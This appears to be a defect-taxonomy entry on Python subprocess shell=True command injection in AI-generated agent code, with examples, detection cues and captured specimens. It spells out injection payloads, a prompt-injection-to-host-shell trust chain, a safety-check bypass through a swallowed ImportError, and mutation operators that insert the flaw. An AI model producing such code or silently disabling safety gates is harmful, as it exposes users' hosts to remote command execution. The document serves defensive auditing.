Shell=True Subprocess Injection
Code example
import subprocess

def fetch_dataset(url: str, dest_path: str) -> None:
    cmd = f"wget -c {url} -O {dest_path}"
    subprocess.run(cmd, shell=True, capture_output=False)
The function works for trusted inputs: wget downloads url to dest_path, and as long as both values are free of shell metacharacters the call behaves as intended.
The defect emerges when either url or dest_path contains shell metacharacters. With url = "http://x; rm -rf ~", the constructed shell string is wget -c http://x; rm -rf ~ -O ... and the shell parses the ; as a command separator: it runs wget -c http://x first and then a second command that begins with rm -rf ~. The same applies to backticks, $(...), |, &&, ||, redirections, glob patterns, and many other shell metacharacters. Any string value reachable from external input becomes a command-injection vector, and a remote-code-execution vector when that input can arrive over the network.
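The parsing behaviour described above can be observed safely by substituting a harmless command. The sketch below is illustrative only: echo stands in for wget, the name run_unsafe is hypothetical, and a POSIX shell is assumed.

```python
import subprocess


def run_unsafe(value: str) -> str:
    """Interpolate value into a shell string, mirroring the defective shape.

    echo is a harmless stand-in for wget (an assumption for this demo).
    """
    cmd = f"echo {value}"
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout


# The ';' ends the first command, so the shell runs a second echo.
injected_output = run_unsafe("fetched; echo INJECTED")
print(injected_output)
```

On a POSIX system the output has two lines, which shows that a single interpolated value produced two separate commands.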
The tightened version uses argument-list form and shell=False (the default):
def fetch_dataset(url: str, dest_path: str) -> None:
    subprocess.run(
        ["wget", "-c", url, "-O", str(dest_path)],
        capture_output=False,
        check=False,
    )
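The argument list is passed directly to the OS exec; no shell is involved, so no metacharacters are interpreted. The function is now immune to shell injection through the values themselves. Two caveats remain: the program being invoked (wget here) still needs to be trusted, and a value that begins with - can still be read by wget as an option rather than as a URL or path.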
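To see that the argument-list form hands each value to the child process verbatim, the following sketch launches a child Python interpreter that reports the arguments it received. It is a demonstration under assumptions: child_argv is a hypothetical helper, and the child interpreter stands in for wget.

```python
import json
import subprocess
import sys


def child_argv(*args: str) -> list[str]:
    """Return the arguments a child process actually receives.

    The child is the current Python interpreter (a stand-in for wget);
    it prints its argument vector as JSON so the parent can parse it.
    """
    code = "import json, sys; print(json.dumps(sys.argv[1:]))"
    result = subprocess.run(
        [sys.executable, "-c", code, *args],
        capture_output=True,
        text=True,
        check=True,
    )
    return json.loads(result.stdout)


# The value containing ';' arrives as one argument, not as two commands.
received = child_argv("http://x; rm -rf ~", "-O", "out.bin")
print(received)
```

The hostile URL reaches the child as a single list element, with the semicolon and the spaces intact, because no shell ever tokenizes it.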
The pattern has several visible sub-shapes in captured specimens:
- shell=True + f-string interpolation: the dual surface to string-built-sql. f"command {var}" passed to subprocess.run(..., shell=True) produces a shell-injection point at each interpolated value. Captured in web3guru888/asi-build#1264 (f"wget -c {url} -O {dest_path}" with shell=True; ASI framework with 11KB CLAUDE.md).
- LLM-output-direct-to-shell: the planning loop produces commands; commands run via subprocess.run(shell=True). No sanitization, no allow-list, no sandboxing. The trust boundary is LLM output → host shell. If the LLM can be prompt-injected, the shell is the payload's target. Captured in peteromallet/megaplan (_run_user_command() in loop/engine.py; "General-purpose planning and execution harness for LLMs").
- Compound shell=True + swallowed-exception bypass of safety check. A safety module (detect_dangerous_command or similar) is supposed to gate command execution, but the safety-module import is wrapped in except ImportError: pass. If the import fails (missing dependency, environment issue), the safety check silently doesn't run and all commands execute unfiltered. Captured in NousResearch/hermes-agent (tui_gateway/server.py, 2 instances; Claude Code-generated audit).
- shell=True + HTTP request parameter direct to shell. User-supplied command from HTTP request is passed straight to a shell with no validation. Captured in NousResearch/hermes-agent instance 2 (also in QuantGeekDev/docker-mcp's WindowsExecutor, supplementary).
All sub-shapes share the same root mechanism: subprocess.run(..., shell=True) with an interpolated string from any externally-reachable source.
Mechanism
A language model generates subprocess-invoking code from a local context that contains:
- A command to run (string template)
- Values to inject into the template
- A subprocess primitive (subprocess.run, subprocess.Popen, os.system, etc.)
The training corpus contains both the safe form and the unsafe form:
- Unsafe (corpus-dominant): subprocess.run(cmd_string, shell=True). Reads naturally; matches how shells are documented in Stack Overflow answers ("just pass the command string"); one-line construction.
- Safe (corpus-recessive): subprocess.run([prog, arg1, arg2], shell=False). The argument list form; requires breaking the command into components; less fluent to write inline.
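The extra step the safe form requires, breaking the command into components, can be small. A minimal sketch, assuming the fixed part of the command is a trusted constant: build_wget_argv is a hypothetical helper name, and the -- separator is an added precaution that is not part of the original example.

```python
import shlex

# Trusted, hardcoded part of the command, split once into components.
WGET_PREFIX = shlex.split("wget -c")


def build_wget_argv(url: str, dest_path: str) -> list[str]:
    """Build an argument list; each variable value is exactly one element."""
    # "--" tells wget that what follows is a URL, not an option.
    return [*WGET_PREFIX, "-O", dest_path, "--", url]


argv = build_wget_argv("http://x; rm -rf ~", "data/out.bin")
print(argv)
```

The resulting list would be passed to subprocess.run(argv) without shell=True; the sketch only builds the list and does not invoke wget.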
The defective shape is over-represented per-token in three corpus segments:
"How do I run a shell command in Python" Stack Overflow answers. The asker's framing — "I have this shell command, how do I run it?" — naturally leads to answers like subprocess.run("cmd args ...", shell=True). The asker had a shell-syntax-formatted command in mind; the answer matches the framing. Security-conscious follow-ups exist in separate Q&A threads.
Tutorial code and beginner Python content. Subprocess tutorials commonly show shell=True because the example is demonstrating that subprocess can run shell commands. The shell-injection caveat is a separate paragraph or footnote that the model doesn't reliably attach to the surface form.
Quick scripts and one-liners. subprocess.run(f"ls {dir}", shell=True) is fluent; subprocess.run(["ls", dir]) is actually shorter to type, but it requires splitting the command into separate arguments, which breaks the shell-syntax flow. Token-level prediction favors the one-liner.
The model knows about shell=True risk in the abstract — it can explain SQL injection and command injection when asked directly. What it does not do reliably during local generation is select the argument-list form when producing a subprocess call. The corpus's shell-syntax-fluent form wins at the per-token decision point.
The pattern interacts with the prompt-injection-induced defect class observation captured in string-built-sql: AI coding tools can be steered toward unsafe-subprocess code via adversarial "coding standards" the same way they can be steered toward unsafe SQL. The defense-in-depth argument applies to both surfaces.
The defect path is direct shell-command-injection at any externally-reachable subprocess call. Concrete attack scenarios from the captured specimens:
- hermes-agent (instance 1): user-config-supplied quick_commands execute with shell=True; any user who edits the config can inject shell commands.
- hermes-agent (instance 2): HTTP request param flows directly to shell=True; remote attacker can execute arbitrary commands.
- megaplan: LLM-output-direct-to-shell; prompt-injected LLM output becomes shell-injection payload.
- asi-build: dataset config URL interpolated into shell string; future trust-boundary movement (community-supplied URLs) makes the latent defect active.
This pattern is AI-amplified, not AI-exclusive. Human Python programmers write shell=True constantly, particularly in scripts. The AI-amplified differential rests on:
- Agent-tool-surface concentration: AI-generated agent systems produce shell=True at the most user-facing surface (TUI gateways, HTTP request handlers, LLM-output-handling). The defect's blast radius is largest exactly where AI produces it most.
- LLM-output-trust-chain: AI tooling that runs LLM-generated commands extends the trust chain through the LLM. Prompt-injection of the LLM becomes shell-injection of the host. Human developers don't have an analogous trust-chain failure mode at this scale.
- Compound shape with swallowed-exceptions: the hermes-agent instance 2 shows safety checks bypassed via except ImportError: pass. The compound defect is more AI-typical than either component alone: AI generates both broad excepts and shell=True, and the combination produces a silent safety-check bypass.
- Codified-guidance-is-insufficient at multiple layers: Bandit B602 (subprocess_popen_with_shell_equals_true), B604 (any_other_function_with_shell_equals_true), B605 (start_process_with_a_shell), and OWASP Command Injection guidance are all codified. AI-generated code reproduces the pattern despite all the rule-coverage.
Evidence / incident
Three captured specimens, each from a different AI-tooling Python project. Detailed specimen notes are not included in the public repository.
- NousResearch/hermes-agent: 2 instances of subprocess.run(..., shell=True) in tui_gateway/server.py (lines 2308 and 3131). Instance 1: user config commands. Instance 2: HTTP request commands with safety check bypassed by except ImportError: pass (compound shape with swallowed-exceptions). Critical severity. Claude Code-generated audit (signed 🤖 Generated with Claude Code). AGENTS.md 51529 bytes (one of the largest in the taxonomy's evidence base). Hermes-agent has now contributed specimens to 6+ taxonomy entries.
- peteromallet/megaplan: _run_user_command() in loop/engine.py:104-107, 246-249 passes LLM output directly to subprocess.run(..., shell=True) with no sanitization or sandboxing. Project description: "General-purpose planning and execution harness for LLMs." The defect surface is the framework's central function.
- web3guru888/asi-build#1264: subprocess.run(f"wget -c {url} -O {dest_path}", shell=True) in download_datasets.py:55-56. Composite shape: shell=True + f-string + url interpolation. "Unified ASI framework" with CLAUDE.md (11511 bytes). The audit explicitly raises the trust-boundary-drift argument: "Dataset registries tend to grow over time, and the trust boundary moves."
Three different sub-shapes (compound shell=True + swallowed-exception bypass / LLM-output-direct-to-shell / shell=True + f-string composite), three different audit framings (Claude Code-generated / community code-audit / community contributor B602 reference), three different AI-tooling project domains (TUI agent gateway / LLM planning harness / ASI framework).
Supplementary references:
- QuantGeekDev/docker-mcp#19 — "Security: Command injection via shell=True in WindowsExecutor" — docker MCP server with shell=True at the executor surface. Same root mechanism in MCP-server deployment context.
- Heldinhow/workflow-dev — "ShellTool uses shell=True - command injection risk" filed in March 2026. Workflow framework's ShellTool — the framework's primary tool is the defect.
- chaoss/CollectOSS — "shell=True could lead to injection in Facade Worker" (2026-04-30). Adjacent specimen in OSS-collection tooling.
Bandit has rules B602 (subprocess_popen_with_shell_equals_true), B604 (any_other_function_with_shell_equals_true), and B605 (start_process_with_a_shell). OWASP Command Injection guidance is widely cited, and the weakness is catalogued as CWE-78 (OS Command Injection). The AI-amplified observation is the concentration at AI-tooling user-facing surfaces.
Detection cues
What to look for in a diff or completion:
- subprocess.run(cmd, shell=True, ...) / subprocess.Popen(cmd, shell=True, ...) where cmd is anything other than a fully-internal hardcoded constant. The most direct signal. Particularly suspect when cmd is an f-string, a .format() result, or a +-concatenated string.
- os.system(cmd) / os.popen(cmd): older API surfaces that always invoke a shell. Same defect class.
- subprocess.run("cmd " + var, ...) / subprocess.run(f"cmd {var}", ...) even when shell=True is omitted. If the first argument is a single string (not a list) and shell=True is not explicit, the behavior depends on the OS, but the intent is shell-syntax and the safety analysis should treat it as shell=True.
- LLM-output-direct-to-subprocess: code that takes a string from an LLM response and passes it to subprocess. The trust chain is LLM → subprocess; the LLM is attackable; the subprocess is the payload's target.
- Agent tool functions that accept commands from external sources (HTTP, WebSocket, user config, request params). The trust boundary is the agent's input surface; subprocess on that surface should always use argument-list form.
- Safety-check imports wrapped in try: import safety; except ImportError: pass. If the safety module governs subprocess execution, the bypass makes the safety check optional. This is the compound shape with swallowed-exceptions captured in the hermes-agent specimen.
- Bandit suppression comments (# nosec, # nosec B602 / B604 / B605, or linter-level # noqa markers for the same rules) without justifying comments. The lint rule has been silenced; verify whether the suppression is principled or reflexive.
The diagnostic question for any subprocess call: can any value flowing into the command string ever be attacker-controlled? If yes, use argument-list form. If no — verify by tracing the data flow — even then prefer argument-list as a future-proofing measure against trust-boundary drift.
Bandit B602, B604, B605 catch the pattern mechanically. Adding them to CI is the structural cure. The argument-list form is virtually never wrong when it's a viable alternative.
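As an illustration of how mechanical the check is, the first two cues can be approximated with the standard-library ast module. This is a minimal sketch and not a replacement for Bandit: find_shell_calls is a hypothetical helper, it only recognises the literal keyword shell=True and direct os.system / os.popen calls, and it misses aliases, shell= passed through a variable, and string-first-argument calls.

```python
import ast

# Functions that always run their argument through a shell.
SHELL_ALWAYS = {("os", "system"), ("os", "popen")}


def find_shell_calls(source: str) -> list[tuple[int, str]]:
    """Return (line, reason) pairs for calls that are likely to invoke a shell."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        # Flag any call that passes the literal keyword shell=True.
        for kw in node.keywords:
            is_true = isinstance(kw.value, ast.Constant) and kw.value.value is True
            if kw.arg == "shell" and is_true:
                findings.append((node.lineno, "shell=True"))
        # Flag os.system / os.popen written as direct attribute calls.
        func = node.func
        if isinstance(func, ast.Attribute) and isinstance(func.value, ast.Name):
            if (func.value.id, func.attr) in SHELL_ALWAYS:
                findings.append((node.lineno, f"{func.value.id}.{func.attr}"))
    return sorted(findings)


sample = '''import os, subprocess
subprocess.run(f"wget -c {url}", shell=True)
subprocess.run(["wget", "-c", url])
os.system("ls " + path)
'''
findings = find_shell_calls(sample)
print(findings)
```

For the sample source, the scanner reports line 2 (shell=True) and line 4 (os.system) and leaves the argument-list call on line 3 alone.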
Notes
Category security. Together with string-built-sql and tarfile-extractall-without-filter, the category spans the three most common AI-amplified security surfaces: SQL injection, command injection, path-traversal-via-archive-extraction.
Difficulty rated low. Spotting shell=True is visually trivial. Bandit B602 catches it mechanically. The reason this is in the taxonomy is AI-tool-surface concentration (the defect lands where AI tooling is most user-facing) and the LLM-output-trust-chain observation (a new defect class introduced by AI agent systems).
The pattern is AI-amplified, not AI-exclusive. Restated: every Python developer who has written subprocess code has used shell=True at some point. The AI-amplified differential rests on agent-tool-surface concentration, LLM-output-trust-chain, compound-shape with swallowed-exceptions, and codified-guidance-insufficient at multiple layers.
False-positive shapes. Be cautious before flagging:
- Hardcoded internal commands. subprocess.run("ls -la", shell=True) with no variables and no external input is safe in the narrow sense. Even here the argument-list form is preferred for clarity, but it isn't a security defect.
- Genuinely-needed shell features. Some commands require pipes, redirections, glob expansion, or environment-variable substitution. The argument-list form can't express these. The cure is either (a) using shlex.quote() on user-controlled values before interpolation, (b) implementing the shell features in Python (pathlib's glob, file-open redirections), or (c) accepting the risk with documented allow-list validation. The cue is whether the audit can identify why shell is required.
- Subprocess with allow-list-validated values. If the value going into the shell string has been validated against a tight allow-list (e.g., if cmd not in {"ls", "ps", "df"}: raise), the injection vector is constrained. The argument-list form is still preferred but the security defect is reduced.
- Test code intentionally testing shell behavior. Tests that exercise shell escaping deliberately may use shell=True. The cue is whether the test is testing shell escaping or just using a shell.
- Migration code from a shell-script-based prior implementation. If the project is incrementally migrating a shell script into Python and the subprocess call is the legacy boundary, shell=True may be transitional. The cue is whether the migration is documented and the transition is being completed.
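Options (a) and (b) from the shell-features item above can be sketched side by side. The example is hypothetical and assumes a POSIX system where printf and tr are available; the function names are illustrative. Note that shlex.quote() is only designed for POSIX shells.

```python
import shlex
import subprocess


def upper_with_shell(value: str) -> str:
    """Option (a): keep the pipe, but quote the value before interpolation."""
    cmd = f"printf %s {shlex.quote(value)} | tr a-z A-Z"
    result = subprocess.run(
        cmd, shell=True, capture_output=True, text=True, check=True
    )
    return result.stdout


def upper_without_shell(value: str) -> str:
    """Option (b): replace the pipe by feeding the data from Python."""
    result = subprocess.run(
        ["tr", "a-z", "A-Z"],
        input=value,
        capture_output=True,
        text=True,
        check=True,
    )
    return result.stdout


payload = "hello; echo injected"
with_shell = upper_with_shell(payload)
without_shell = upper_without_shell(payload)
print(with_shell, without_shell)
```

Both calls treat the semicolon as data. The second form removes the shell entirely, which is why it stays safe even if a later edit forgets the quoting step.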
Mutation operator hint. A deterministic mutation that introduces the pattern from clean code:
- Take subprocess.run([prog, arg1, arg2]) and replace with subprocess.run(f"{prog} {arg1} {arg2}", shell=True)
- Take subprocess.run([cmd], shell=False) and add shell=True
- Replace argument-list form with os.system(cmd_string)
- Take a safety-module-gated subprocess and wrap the safety-module import in try: import safety; except ImportError: pass (compound with swallowed-exceptions)
These compose with string-built-sql (same root mechanism applied to SQL vs shell), swallowed-exceptions (the compound bypass shape captured in hermes-agent), and hardcoded-config-values (when the shell command target is hardcoded but the arguments are interpolated, the configuration is half-secure).
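The second mutation operator listed above (forcing shell=True on a subprocess.run call) could be implemented with an ast.NodeTransformer. This is a rough sketch for building detector test fixtures, not a complete mutation tool: the class and function names are hypothetical, only calls spelled subprocess.run(...) are matched, and ast.unparse requires Python 3.9 or later.

```python
import ast


class AddShellTrue(ast.NodeTransformer):
    """Rewrite subprocess.run(...) calls so that they pass shell=True."""

    def visit_Call(self, node: ast.Call) -> ast.Call:
        self.generic_visit(node)
        func = node.func
        is_subprocess_run = (
            isinstance(func, ast.Attribute)
            and func.attr == "run"
            and isinstance(func.value, ast.Name)
            and func.value.id == "subprocess"
        )
        if is_subprocess_run:
            # Drop any existing shell= keyword, then force shell=True.
            node.keywords = [kw for kw in node.keywords if kw.arg != "shell"]
            node.keywords.append(
                ast.keyword(arg="shell", value=ast.Constant(value=True))
            )
        return node


def mutate(source: str) -> str:
    """Return source with the shell=True mutation applied."""
    tree = AddShellTrue().visit(ast.parse(source))
    ast.fix_missing_locations(tree)
    return ast.unparse(tree)


mutated = mutate("subprocess.run([cmd], shell=False)")
print(mutated)
```

Because the transformation is deterministic, the mutated output can serve as a known-positive input when checking that a linter rule or review prompt flags the pattern.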
Connection to codified-guidance-is-insufficient note. Bandit B602/B604/B605 + OWASP guidance + CWE-78 + project-level CLAUDE.md / AGENTS.md (in hermes-agent, asi-build, etc.) — all are codified, well-known, widely-cited. AI-generated codebases reproduce the pattern despite all four layers. The compound shape (shell=True + swallowed-exception bypass) demonstrates how AI-typical defects compose to defeat even intended safety checks.
Connection to LLM-output-trust-chain observation. The megaplan specimen captures a defect class that didn't exist before AI agent frameworks: AI-generated commands executed on a host. The trust chain is user → planner → LLM → subprocess. Prompt injection of the LLM (via task description, retrieved context, tool result, or attacker-supplied input anywhere upstream) becomes shell injection of the host. This is structurally similar to the prompt-injection-induced sub-shape in string-built-sql (Aider's case) but with a more direct attack path — the LLM doesn't need to modify project code; it just needs to produce a command.
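One way to narrow this trust chain is to never hand the model's string to a shell at all: tokenize it, check the program against an allow-list, and execute the resulting argument list. The sketch below is illustrative and is not taken from megaplan; ALLOWED_PROGRAMS and both function names are hypothetical, and an allow-list on program names does not bound what the arguments can do, so sandboxing would still be needed in practice.

```python
import shlex
import subprocess

# Hypothetical allow-list; a real deployment would choose its own entries.
ALLOWED_PROGRAMS = {"ls", "df", "ps"}


def parse_proposed_command(command: str) -> list[str]:
    """Turn an untrusted command string into a vetted argument list.

    Raises ValueError when the program is not on the allow-list
    (shlex.split also raises ValueError on unbalanced quotes).
    """
    argv = shlex.split(command)
    if not argv or argv[0] not in ALLOWED_PROGRAMS:
        raise ValueError(f"command not permitted: {command!r}")
    return argv


def run_proposed_command(command: str) -> subprocess.CompletedProcess:
    """Run a vetted command without a shell, so metacharacters stay literal."""
    return subprocess.run(
        parse_proposed_command(command),
        capture_output=True,
        text=True,
        timeout=30,
    )


vetted = parse_proposed_command("ls -la /tmp")
print(vetted)
```

A proposed command such as curl http://evil.example | sh is rejected at the allow-list check, and a string like ls /tmp; rm -rf ~ only passes ; rm -rf ~ to ls as literal arguments because no shell ever parses it.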
Connection to deployment-context-blind defects cluster. This entry joins seven prior entries in the cluster of defects whose blast radius is largest in production deployment contexts. Specifically, this entry's deployment context is receives-external-command-input — which AI agent frameworks routinely have at their TUI / HTTP / LLM-tool surfaces.
The compound shape is a methodologically new observation. The hermes-agent specimen captures three taxonomy entries' worth of mechanism in one defect path:
- shell=True (the primary injection vector)
- except ImportError: pass on safety-module import (swallowed-exceptions)
- The safety module exists and is intended; the defective import + suppression makes it not run (codified-guidance-defeated-by-its-own-implementation)
This compound shape is methodologically richer than any single-pattern defect. AI-typical defects compose — combining mechanisms produces qualitatively more severe outcomes than any individual mechanism alone.